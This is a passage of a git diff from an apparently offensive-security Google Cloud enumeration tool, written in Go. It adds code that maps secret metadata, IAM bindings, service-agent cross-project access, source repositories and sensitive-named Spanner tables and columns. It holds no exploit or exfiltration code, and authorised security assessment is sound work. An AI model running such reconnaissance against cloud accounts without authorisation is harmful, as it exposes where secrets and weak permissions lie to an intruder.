+ } + + if job.AppEngineHttpTarget != nil { + info.TargetType = "appengine" + info.TargetURI = job.AppEngineHttpTarget.RelativeUri + info.TargetHTTPMethod = job.AppEngineHttpTarget.HttpMethod + if job.AppEngineHttpTarget.AppEngineRouting != nil { + info.TargetService = job.AppEngineHttpTarget.AppEngineRouting.Service + info.TargetVersion = job.AppEngineHttpTarget.AppEngineRouting.Version + } + } + + // Retry configuration + if job.RetryConfig != nil { + info.RetryCount = job.RetryConfig.RetryCount + info.MaxRetryDuration = job.RetryConfig.MaxRetryDuration + info.MaxBackoff = job.RetryConfig.MaxBackoffDuration + } + + // Timing info + info.LastAttemptTime = job.LastAttemptTime + info.ScheduleTime = job.ScheduleTime + if job.Status != nil { + info.Status = formatJobStatus(job.Status) + } + + return info +} + +// formatJobStatus formats the job status for display +func formatJobStatus(status *scheduler.Status) string { + if status.Code == 0 { + return "OK" + } + return fmt.Sprintf("Error %d: %s", status.Code, status.Message) +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/secretsService/secretsService.go b/gcp/services/secretsService/secretsService.go index 75b9f510..e621e5aa 100644 --- a/gcp/services/secretsService/secretsService.go +++ b/gcp/services/secretsService/secretsService.go @@ -2,11 +2,19 @@ package secretservice import ( "context" + "encoding/json" "fmt" + "io" + "net/http" + "strings" + "time" secretmanager "cloud.google.com/go/secretmanager/apiv1" secretmanagerpb "cloud.google.com/go/secretmanager/apiv1/secretmanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" "github.com/googleapis/gax-go/v2" + "golang.org/x/oauth2/google" "google.golang.org/api/iterator" ) @@ -18,6 +26,8 @@ type Iterator interface { type SecretsManagerClientWrapper struct { Closer func() error SecretLister func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator + IAMGetter func(ctx context.Context, secretName string) (*secretmanagerpb.Secret, error) + rawClient *secretmanager.Client } func (w *SecretsManagerClientWrapper) Close() error { @@ -26,14 +36,22 @@ func (w *SecretsManagerClientWrapper) Close() error { func (w *SecretsManagerClientWrapper) ListSecrets(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return w.SecretLister(ctx, req, opts...) - } type SecretsService struct { - Client *SecretsManagerClientWrapper + Client *SecretsManagerClientWrapper + session *gcpinternal.SafeSession +} + +// getClient returns a cached Secret Manager client +func (s *SecretsService) getClient(ctx context.Context) (*secretmanager.Client, error) { + if s.session != nil { + return sdk.CachedGetSecretManagerClient(ctx, s.session) + } + return secretmanager.NewClient(ctx) } -// New function to facilitate using the ss client +// New creates a SecretsService with the provided client func New(client *secretmanager.Client) SecretsService { ss := SecretsService{ Client: &SecretsManagerClientWrapper{ @@ -41,17 +59,82 @@ func New(client *secretmanager.Client) SecretsService { SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return client.ListSecrets(ctx, req, opts...) }, + rawClient: client, }, } return ss } +// NewWithSession creates a SecretsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (SecretsService, error) { + ctx := context.Background() + ss := SecretsService{ + session: session, + } + + client, err := ss.getClient(ctx) + if err != nil { + return SecretsService{}, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") + } + + ss.Client = &SecretsManagerClientWrapper{ + Closer: client.Close, + SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { + return client.ListSecrets(ctx, req, opts...) + }, + rawClient: client, + } + return ss, nil +} + +// IAMBinding represents a single IAM binding on a secret +type IAMBinding struct { + Role string `json:"role"` + Members []string `json:"members"` +} + +// SecretInfo contains secret metadata and security-relevant configuration type SecretInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectID"` - CreationTime string `json:"creationTime"` - Labels map[string]string `json:"labels"` - Rotation string `json:"rotation,omitempty"` + // Basic info + Name string `json:"name"` + ProjectID string `json:"projectID"` + + // Timestamps + CreationTime string `json:"creationTime"` + + // Replication + ReplicationType string `json:"replicationType"` // "automatic" or "user-managed" + ReplicaLocations []string `json:"replicaLocations,omitempty"` // Locations for user-managed replication + + // Encryption + EncryptionType string `json:"encryptionType"` // "Google-managed" or "CMEK" + KMSKeyName string `json:"kmsKeyName,omitempty"` // KMS key for CMEK + + // Expiration + HasExpiration bool `json:"hasExpiration"` + ExpireTime string `json:"expireTime,omitempty"` + TTL string `json:"ttl,omitempty"` + + // Rotation + Rotation string `json:"rotation,omitempty"` + NextRotationTime string `json:"nextRotationTime,omitempty"` + RotationPeriod string `json:"rotationPeriod,omitempty"` + + // Version Management + VersionDestroyTTL string `json:"versionDestroyTtl,omitempty"` // Delayed destruction + + // Metadata + Labels map[string]string `json:"labels,omitempty"` + Annotations map[string]string `json:"annotations,omitempty"` + + // Topics (Pub/Sub notifications) + Topics []string `json:"topics,omitempty"` + + // Version Aliases + VersionAliases map[string]int64 `json:"versionAliases,omitempty"` + + // IAM Policy + IAMBindings []IAMBinding `json:"iamBindings,omitempty"` } func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { @@ -63,21 +146,234 @@ func (ss *SecretsService) Secrets(projectID string) ([]SecretInfo, error) { ctx := context.Background() it := ss.Client.ListSecrets(ctx, req) for { - resp, err := it.Next() //Here it errors out + resp, err := it.Next() if err == iterator.Done { break } if err != nil { - return nil, fmt.Errorf("failed to list secrets: %v", err) + return nil, gcpinternal.ParseGCPError(err, "secretmanager.googleapis.com") } - secrets = append(secrets, SecretInfo{ + secret := SecretInfo{ Name: resp.Name, ProjectID: projectID, - CreationTime: resp.CreateTime.AsTime().String(), + CreationTime: resp.CreateTime.AsTime().Format(time.RFC3339), Labels: resp.Labels, - Rotation: resp.Rotation.String(), - }) + Annotations: resp.Annotations, + } + + // Parse replication type + if resp.Replication != nil { + switch r := resp.Replication.Replication.(type) { + case *secretmanagerpb.Replication_Automatic_: + secret.ReplicationType = "automatic" + // Check for CMEK in automatic replication + if r.Automatic != nil && r.Automatic.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = r.Automatic.CustomerManagedEncryption.KmsKeyName + } else { + secret.EncryptionType = "Google-managed" + } + case *secretmanagerpb.Replication_UserManaged_: + secret.ReplicationType = "user-managed" + if r.UserManaged != nil { + for _, replica := range r.UserManaged.Replicas { + secret.ReplicaLocations = append(secret.ReplicaLocations, replica.Location) + // Check for CMEK in user-managed replication + if replica.CustomerManagedEncryption != nil { + secret.EncryptionType = "CMEK" + secret.KMSKeyName = replica.CustomerManagedEncryption.KmsKeyName + } + } + } + if secret.EncryptionType == "" { + secret.EncryptionType = "Google-managed" + } + } + } + + // Parse expiration + if resp.Expiration != nil { + secret.HasExpiration = true + switch e := resp.Expiration.(type) { + case *secretmanagerpb.Secret_ExpireTime: + if e.ExpireTime != nil { + secret.ExpireTime = e.ExpireTime.AsTime().Format(time.RFC3339) + } + case *secretmanagerpb.Secret_Ttl: + if e.Ttl != nil { + secret.TTL = e.Ttl.AsDuration().String() + } + } + } + + // Parse rotation + if resp.Rotation != nil { + secret.Rotation = "enabled" + if resp.Rotation.NextRotationTime != nil { + secret.NextRotationTime = resp.Rotation.NextRotationTime.AsTime().Format(time.RFC3339) + } + if resp.Rotation.RotationPeriod != nil { + secret.RotationPeriod = resp.Rotation.RotationPeriod.AsDuration().String() + } + } else { + secret.Rotation = "disabled" + } + + // Get VersionDestroyTTL via REST API (may not be available in all SDK versions) + ss.enrichSecretFromRestAPI(ctx, &secret) + + // Parse topics + if len(resp.Topics) > 0 { + for _, topic := range resp.Topics { + secret.Topics = append(secret.Topics, topic.Name) + } + } + + // Parse version aliases + if len(resp.VersionAliases) > 0 { + secret.VersionAliases = resp.VersionAliases + } + + // Get IAM policy for the secret + iamBindings := ss.getSecretIAMPolicy(ctx, resp.Name) + secret.IAMBindings = iamBindings + + secrets = append(secrets, secret) } return secrets, nil } + +// getSecretIAMPolicy retrieves the IAM policy for a secret +func (ss *SecretsService) getSecretIAMPolicy(ctx context.Context, secretName string) []IAMBinding { + var bindings []IAMBinding + + if ss.Client.rawClient == nil { + return bindings + } + + // Get IAM policy using the raw client + policy, err := ss.Client.rawClient.IAM(secretName).Policy(ctx) + if err != nil { + // Return empty bindings if we can't get the policy (permission denied, etc.) + return bindings + } + + // Convert IAM policy to our binding format + for _, role := range policy.Roles() { + members := policy.Members(role) + if len(members) > 0 { + binding := IAMBinding{ + Role: string(role), + Members: make([]string, len(members)), + } + for i, member := range members { + binding.Members[i] = member + } + bindings = append(bindings, binding) + } + } + + return bindings +} + +// FormatIAMBindings formats IAM bindings for display +func FormatIAMBindings(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "No IAM bindings" + } + + var parts []string + for _, binding := range bindings { + memberStr := strings.Join(binding.Members, ", ") + parts = append(parts, fmt.Sprintf("%s: [%s]", binding.Role, memberStr)) + } + return strings.Join(parts, "; ") +} + +// FormatIAMBindingsShort formats IAM bindings in a shorter format for table display +func FormatIAMBindingsShort(bindings []IAMBinding) string { + if len(bindings) == 0 { + return "-" + } + return fmt.Sprintf("%d binding(s)", len(bindings)) +} + +// secretAPIResponse represents the raw JSON response from Secret Manager API +// to capture fields that may not be in the SDK yet +type secretAPIResponse struct { + VersionDestroyTtl string `json:"versionDestroyTtl,omitempty"` +} + +// enrichSecretFromRestAPI fetches additional secret fields via direct HTTP request +// that may not be available in the Go SDK version +func (ss *SecretsService) enrichSecretFromRestAPI(ctx context.Context, secret *SecretInfo) { + var accessToken string + + // Try to use session token if available + if ss.session != nil { + token, err := ss.session.GetToken(ctx) + if err == nil { + accessToken = token + } + } + + // Fall back to default credentials if no session token + if accessToken == "" { + creds, err := google.FindDefaultCredentials(ctx, "https://www.googleapis.com/auth/cloud-platform") + if err != nil { + return + } + token, err := creds.TokenSource.Token() + if err != nil { + return + } + accessToken = token.AccessToken + } + + // Build the API URL + // Secret name format: projects/{project}/secrets/{secret} + url := fmt.Sprintf("https://secretmanager.googleapis.com/v1/%s", secret.Name) + + // Create request + req, err := http.NewRequestWithContext(ctx, "GET", url, nil) + if err != nil { + return + } + req.Header.Set("Authorization", "Bearer "+accessToken) + + // Make request + client := &http.Client{} + resp, err := client.Do(req) + if err != nil { + return + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return + } + + // Read response body + body, err := io.ReadAll(resp.Body) + if err != nil { + return + } + + // Parse JSON + var apiResp secretAPIResponse + if err := json.Unmarshal(body, &apiResp); err != nil { + return + } + + // Parse VersionDestroyTTL + if apiResp.VersionDestroyTtl != "" { + // Parse duration string (e.g., "86400s" for 1 day) + if dur, err := time.ParseDuration(apiResp.VersionDestroyTtl); err == nil { + secret.VersionDestroyTTL = dur.String() + } else { + // If parsing fails, use the raw value + secret.VersionDestroyTTL = apiResp.VersionDestroyTtl + } + } +} diff --git a/gcp/services/secretsService/secretsService_test.go b/gcp/services/secretsService/secretsService_test.go index a8e63898..dca529fe 100644 --- a/gcp/services/secretsService/secretsService_test.go +++ b/gcp/services/secretsService/secretsService_test.go @@ -115,8 +115,9 @@ func TestSecrets(t *testing.T) { { Name: "projects/my-project/secrets/secret1", ProjectID: "my-project", - CreationTime: time.Date(2020, 1, 1, 0, 0, 0, 0, time.UTC).String(), + CreationTime: time.Date(2020, 1, 1, 0, 0, 0, 0, time.UTC).Format(time.RFC3339), Labels: map[string]string{"env": "test"}, + Rotation: "disabled", }, }, wantErr: false, diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go new file mode 100644 index 00000000..fbc209bd --- /dev/null +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -0,0 +1,335 @@ +package serviceagentsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" +) + +type ServiceAgentsService struct{ + session *gcpinternal.SafeSession +} + +func New() *ServiceAgentsService { + return &ServiceAgentsService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *ServiceAgentsService { + return &ServiceAgentsService{ + session: session, + } +} + +// ServiceAgentInfo represents a Google-managed service agent +type ServiceAgentInfo struct { + Email string `json:"email"` + ProjectID string `json:"projectId"` + SourceProject string `json:"sourceProject"` // Project the agent belongs to (extracted from email) + ServiceName string `json:"serviceName"` + AgentType string `json:"agentType"` // compute, gke, cloudbuild, etc. + Roles []string `json:"roles"` + IsCrossProject bool `json:"isCrossProject"` + Description string `json:"description"` +} + +// KnownServiceAgents maps service agent patterns to their descriptions +var KnownServiceAgents = map[string]struct { + Service string + Description string +}{ + "@cloudservices.gserviceaccount.com": { + Service: "Google APIs", + Description: "Google APIs Service Agent - manages resources on behalf of Google Cloud services", + }, + "@compute-system.iam.gserviceaccount.com": { + Service: "Compute Engine", + Description: "Compute Engine Service Agent - manages Compute Engine resources", + }, + "@container-engine-robot.iam.gserviceaccount.com": { + Service: "GKE", + Description: "Kubernetes Engine Service Agent - manages GKE clusters", + }, + "@cloudbuild.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Account - runs build jobs", + }, + "@gcp-sa-cloudbuild.iam.gserviceaccount.com": { + Service: "Cloud Build", + Description: "Cloud Build Service Agent - manages Cloud Build resources", + }, + "@cloudcomposer-accounts.iam.gserviceaccount.com": { + Service: "Composer", + Description: "Cloud Composer Service Agent - manages Airflow environments", + }, + "@dataflow-service-producer-prod.iam.gserviceaccount.com": { + Service: "Dataflow", + Description: "Dataflow Service Agent - manages Dataflow jobs", + }, + "@gcp-sa-dataproc.iam.gserviceaccount.com": { + Service: "Dataproc", + Description: "Dataproc Service Agent - manages Dataproc clusters", + }, + "@gcp-sa-pubsub.iam.gserviceaccount.com": { + Service: "Pub/Sub", + Description: "Pub/Sub Service Agent - manages Pub/Sub resources", + }, + "@serverless-robot-prod.iam.gserviceaccount.com": { + Service: "Cloud Run/Functions", + Description: "Serverless Service Agent - manages serverless resources", + }, + "@gcp-sa-cloudscheduler.iam.gserviceaccount.com": { + Service: "Cloud Scheduler", + Description: "Cloud Scheduler Service Agent", + }, + "@gcp-sa-bigquery.iam.gserviceaccount.com": { + Service: "BigQuery", + Description: "BigQuery Service Agent - manages BigQuery resources", + }, + "@gcp-sa-artifactregistry.iam.gserviceaccount.com": { + Service: "Artifact Registry", + Description: "Artifact Registry Service Agent", + }, + "@gcp-sa-secretmanager.iam.gserviceaccount.com": { + Service: "Secret Manager", + Description: "Secret Manager Service Agent", + }, + "@gcp-sa-firestore.iam.gserviceaccount.com": { + Service: "Firestore", + Description: "Firestore Service Agent", + }, + "@gcp-sa-cloud-sql.iam.gserviceaccount.com": { + Service: "Cloud SQL", + Description: "Cloud SQL Service Agent", + }, + "@gcp-sa-logging.iam.gserviceaccount.com": { + Service: "Cloud Logging", + Description: "Cloud Logging Service Agent", + }, + "@gcp-sa-monitoring.iam.gserviceaccount.com": { + Service: "Cloud Monitoring", + Description: "Cloud Monitoring Service Agent", + }, +} + +// getResourceManagerService returns a Cloud Resource Manager service client using cached session if available +func (s *ServiceAgentsService) getResourceManagerService(ctx context.Context) (*cloudresourcemanager.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return cloudresourcemanager.NewService(ctx) +} + +// GetServiceAgents retrieves all service agents with IAM bindings. +// If orgCache is provided, it resolves project numbers to IDs for accurate cross-project detection. +func (s *ServiceAgentsService) GetServiceAgents(projectID string, orgCache ...*gcpinternal.OrgCache) ([]ServiceAgentInfo, error) { + ctx := context.Background() + service, err := s.getResourceManagerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + // Get optional OrgCache + var cache *gcpinternal.OrgCache + if len(orgCache) > 0 { + cache = orgCache[0] + } + + var agents []ServiceAgentInfo + + // Get IAM policy + policy, err := service.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + // Track which service agents we've seen + seenAgents := make(map[string]*ServiceAgentInfo) + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if !strings.HasPrefix(member, "serviceAccount:") { + continue + } + + email := strings.TrimPrefix(member, "serviceAccount:") + + // Check if it's a service agent + agentType, description := s.identifyServiceAgent(email) + if agentType == "" { + continue // Not a service agent + } + + // Extract source project from email (may be a project number or ID) + sourceProject := s.extractSourceProject(email) + + // Resolve project number to ID using OrgCache if available + sourceProjectID := sourceProject + if cache != nil && cache.IsPopulated() && sourceProject != "" { + if resolved := cache.GetProjectIDByNumber(sourceProject); resolved != "" { + sourceProjectID = resolved + } + } + + // Check for cross-project access using resolved ID + isCrossProject := sourceProjectID != "" && sourceProjectID != projectID + + // Add or update agent + if agent, exists := seenAgents[email]; exists { + agent.Roles = append(agent.Roles, binding.Role) + } else { + agent := &ServiceAgentInfo{ + Email: email, + ProjectID: projectID, + SourceProject: sourceProjectID, + ServiceName: agentType, + AgentType: agentType, + Roles: []string{binding.Role}, + IsCrossProject: isCrossProject, + Description: description, + } + seenAgents[email] = agent + } + } + } + + // Convert to slice + for _, agent := range seenAgents { + agents = append(agents, *agent) + } + + return agents, nil +} + +// extractSourceProject extracts the source project ID/number from a service agent email +func (s *ServiceAgentsService) extractSourceProject(email string) string { + parts := strings.Split(email, "@") + if len(parts) != 2 { + return "" + } + + prefix := parts[0] + domain := parts[1] + + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + return prefix // This is the project number + } + + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + return prefix[:idx] // Project number + } + } + + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix // This is the project ID + } + + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + if strings.HasPrefix(prefix, "service-") { + return strings.TrimPrefix(prefix, "service-") // Project number + } + return prefix + } + + // Pattern: PROJECT_NUMBER@compute-system.iam.gserviceaccount.com + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + // Most service agents use project number as prefix + if strings.HasPrefix(prefix, "service-") { + return strings.TrimPrefix(prefix, "service-") + } + return prefix + } + + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + return prefix // Project number + } + + // Pattern: PROJECT_NUMBER@container-engine-robot.iam.gserviceaccount.com + if strings.Contains(domain, "container-engine-robot") { + return prefix + } + + // Pattern: PROJECT_NUMBER@serverless-robot-prod.iam.gserviceaccount.com + if strings.Contains(domain, "serverless-robot-prod") { + return prefix + } + + return "" +} + +func (s *ServiceAgentsService) identifyServiceAgent(email string) (string, string) { + // Check known patterns + for suffix, info := range KnownServiceAgents { + if strings.HasSuffix(email, suffix) { + return info.Service, info.Description + } + } + + // Check for generic service agent patterns + if strings.Contains(email, "@gcp-sa-") { + // Extract service name from gcp-sa-{service} + parts := strings.Split(email, "@") + if len(parts) == 2 { + saPart := parts[1] + if strings.HasPrefix(saPart, "gcp-sa-") { + serviceName := strings.TrimPrefix(saPart, "gcp-sa-") + serviceName = strings.Split(serviceName, ".")[0] + return serviceName, fmt.Sprintf("%s Service Agent", serviceName) + } + } + } + + // Check for project-specific service agents + if strings.Contains(email, "-compute@developer.gserviceaccount.com") { + return "Compute Engine", "Default Compute Engine service account" + } + + if strings.Contains(email, "@appspot.gserviceaccount.com") { + return "App Engine", "App Engine default service account" + } + + return "", "" +} + +// GetDefaultServiceAccounts returns the default service accounts for a project +func (s *ServiceAgentsService) GetDefaultServiceAccounts(projectID string, projectNumber string) []ServiceAgentInfo { + var defaults []ServiceAgentInfo + + // Google APIs Service Agent + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@cloudservices.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Google APIs", + AgentType: "Google APIs", + Description: "Google APIs Service Agent - automatically created, manages resources on behalf of Google Cloud services", + }) + + // Compute Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s-compute@developer.gserviceaccount.com", projectNumber), + ProjectID: projectID, + ServiceName: "Compute Engine", + AgentType: "Compute Engine", + Description: "Default Compute Engine service account - used by instances without explicit SA", + }) + + // App Engine default SA + defaults = append(defaults, ServiceAgentInfo{ + Email: fmt.Sprintf("%s@appspot.gserviceaccount.com", projectID), + ProjectID: projectID, + ServiceName: "App Engine", + AgentType: "App Engine", + Description: "App Engine default service account", + }) + + return defaults +} diff --git a/gcp/services/sourceReposService/sourceReposService.go b/gcp/services/sourceReposService/sourceReposService.go new file mode 100644 index 00000000..5aaaef24 --- /dev/null +++ b/gcp/services/sourceReposService/sourceReposService.go @@ -0,0 +1,132 @@ +package sourcereposservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + sourcerepo "google.golang.org/api/sourcerepo/v1" +) + +type SourceReposService struct{ + session *gcpinternal.SafeSession +} + +func New() *SourceReposService { + return &SourceReposService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SourceReposService { + return &SourceReposService{ + session: session, + } +} + +// RepoInfo represents a Cloud Source Repository +type RepoInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + URL string `json:"url"` + Size int64 `json:"size"` + MirrorConfig bool `json:"mirrorConfig"` + MirrorURL string `json:"mirrorUrl"` + PubsubConfigs int `json:"pubsubConfigs"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// getService returns a source repo service client using cached session if available +func (s *SourceReposService) getService(ctx context.Context) (*sourcerepo.Service, error) { + if s.session != nil { + return sdk.CachedGetSourceRepoService(ctx, s.session) + } + return sourcerepo.NewService(ctx) +} + +// ListRepos retrieves all Cloud Source Repositories in a project +func (s *SourceReposService) ListRepos(projectID string) ([]RepoInfo, error) { + ctx := context.Background() + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + var repos []RepoInfo + + parent := fmt.Sprintf("projects/%s", projectID) + resp, err := service.Projects.Repos.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "sourcerepo.googleapis.com") + } + + for _, repo := range resp.Repos { + info := s.parseRepo(repo, projectID) + + // Get IAM policy for this repo + iamBindings := s.getRepoIAMBindings(service, repo.Name) + info.IAMBindings = iamBindings + + repos = append(repos, info) + } + + return repos, nil +} + +// getRepoIAMBindings retrieves IAM bindings for a repository +func (s *SourceReposService) getRepoIAMBindings(service *sourcerepo.Service, repoName string) []IAMBinding { + var bindings []IAMBinding + + policy, err := service.Projects.Repos.GetIamPolicy(repoName).OptionsRequestedPolicyVersion(3).Do() + if err != nil { + // Silently skip if we can't get IAM policy + return bindings + } + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +func (s *SourceReposService) parseRepo(repo *sourcerepo.Repo, projectID string) RepoInfo { + // Extract repo name from full path + name := repo.Name + if strings.Contains(name, "/") { + parts := strings.Split(name, "/") + name = parts[len(parts)-1] + } + + info := RepoInfo{ + Name: name, + ProjectID: projectID, + URL: repo.Url, + Size: repo.Size, + } + + // Check for mirror configuration + if repo.MirrorConfig != nil { + info.MirrorConfig = true + info.MirrorURL = repo.MirrorConfig.Url + } + + // Count pubsub configs + if repo.PubsubConfigs != nil { + info.PubsubConfigs = len(repo.PubsubConfigs) + } + + return info +} + diff --git a/gcp/services/spannerEnumService/spannerEnumService.go b/gcp/services/spannerEnumService/spannerEnumService.go new file mode 100644 index 00000000..0b2634f6 --- /dev/null +++ b/gcp/services/spannerEnumService/spannerEnumService.go @@ -0,0 +1,201 @@ +package spannerenumservice + +import ( + "context" + "fmt" + "regexp" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerEnumService { + return &SpannerEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SpannerEnumService { + return &SpannerEnumService{session: session} +} + +// SensitiveSpannerResource represents a Spanner resource flagged as potentially sensitive. +type SensitiveSpannerResource struct { + ProjectID string `json:"projectId"` + Instance string `json:"instance"` + Database string `json:"database"` + Table string `json:"table"` + Column string `json:"column"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getSpannerService returns a Spanner service client. +func (s *SpannerEnumService) getSpannerService(ctx context.Context) (*spanner.Service, error) { + return spanner.NewService(ctx) +} + +// EnumerateSensitiveResources scans Spanner DDL for sensitive table/column names. +func (s *SpannerEnumService) EnumerateSensitiveResources(projectID string) ([]SensitiveSpannerResource, error) { + ctx := context.Background() + + service, err := s.getSpannerService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + var resources []SensitiveSpannerResource + + // List instances + parent := fmt.Sprintf("projects/%s", projectID) + err = service.Projects.Instances.List(parent).Pages(ctx, func(page *spanner.ListInstancesResponse) error { + for _, instance := range page.Instances { + instanceName := extractName(instance.Name) + + // List databases for this instance + err := service.Projects.Instances.Databases.List(instance.Name).Pages(ctx, func(dbPage *spanner.ListDatabasesResponse) error { + for _, db := range dbPage.Databases { + dbName := extractName(db.Name) + + // Get DDL for this database + ddlResp, err := service.Projects.Instances.Databases.GetDdl(db.Name).Context(ctx).Do() + if err != nil { + continue + } + + // Parse DDL for table and column names + for _, stmt := range ddlResp.Statements { + tableName, columns := parseDDLStatement(stmt) + if tableName == "" { + continue + } + + // Check table name + if match := shared.MatchResourceName(tableName, namePatterns); match != nil { + resources = append(resources, SensitiveSpannerResource{ + ProjectID: projectID, + Instance: instanceName, + Database: dbName, + Table: tableName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Check column names + for _, col := range columns { + if match := shared.MatchResourceName(col, namePatterns); match != nil { + resources = append(resources, SensitiveSpannerResource{ + ProjectID: projectID, + Instance: instanceName, + Database: dbName, + Table: tableName, + Column: col, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column name: %s", match.Description), + }) + } + } + } + } + return nil + }) + if err != nil { + // Continue to next instance on error + continue + } + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "spanner.googleapis.com") + } + + return resources, nil +} + +// createTableRegex matches CREATE TABLE statements. +var createTableRegex = regexp.MustCompile(`(?i)CREATE\s+TABLE\s+(\S+)\s*\(`) + +// columnRegex matches column definitions inside CREATE TABLE parentheses. +var columnRegex = regexp.MustCompile(`(?i)^\s*(\w+)\s+`) + +// parseDDLStatement extracts table name and column names from a CREATE TABLE DDL statement. +func parseDDLStatement(stmt string) (string, []string) { + match := createTableRegex.FindStringSubmatch(stmt) + if match == nil { + return "", nil + } + + tableName := strings.Trim(match[1], "`\"") + + // Find the content between the first ( and the matching ) + parenStart := strings.Index(stmt, "(") + if parenStart < 0 { + return tableName, nil + } + + // Find matching closing paren + depth := 0 + parenEnd := -1 + for i := parenStart; i < len(stmt); i++ { + switch stmt[i] { + case '(': + depth++ + case ')': + depth-- + if depth == 0 { + parenEnd = i + } + } + if parenEnd >= 0 { + break + } + } + + if parenEnd < 0 { + return tableName, nil + } + + columnsStr := stmt[parenStart+1 : parenEnd] + lines := strings.Split(columnsStr, ",") + + var columns []string + for _, line := range lines { + line = strings.TrimSpace(line) + if line == "" { + continue + } + // Skip constraint lines + lineLower := strings.ToLower(line) + if strings.HasPrefix(lineLower, "constraint") || + strings.HasPrefix(lineLower, "primary key") || + strings.HasPrefix(lineLower, "foreign key") || + strings.HasPrefix(lineLower, "interleave") { + continue + } + colMatch := columnRegex.FindStringSubmatch(line) + if colMatch != nil { + columns = append(columns, colMatch[1]) + } + } + + return tableName, columns +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/spannerService/spannerService.go b/gcp/services/spannerService/spannerService.go new file mode 100644 index 00000000..00609ed1 --- /dev/null +++ b/gcp/services/spannerService/spannerService.go @@ -0,0 +1,200 @@ +package spannerservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + spanner "google.golang.org/api/spanner/v1" +) + +type SpannerService struct { + session *gcpinternal.SafeSession +} + +func New() *SpannerService { + return &SpannerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *SpannerService { + return &SpannerService{ + session: session, + } +} + +// IAMBinding represents a single IAM binding (one role + one member) +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +type SpannerInstanceInfo struct { + Name string 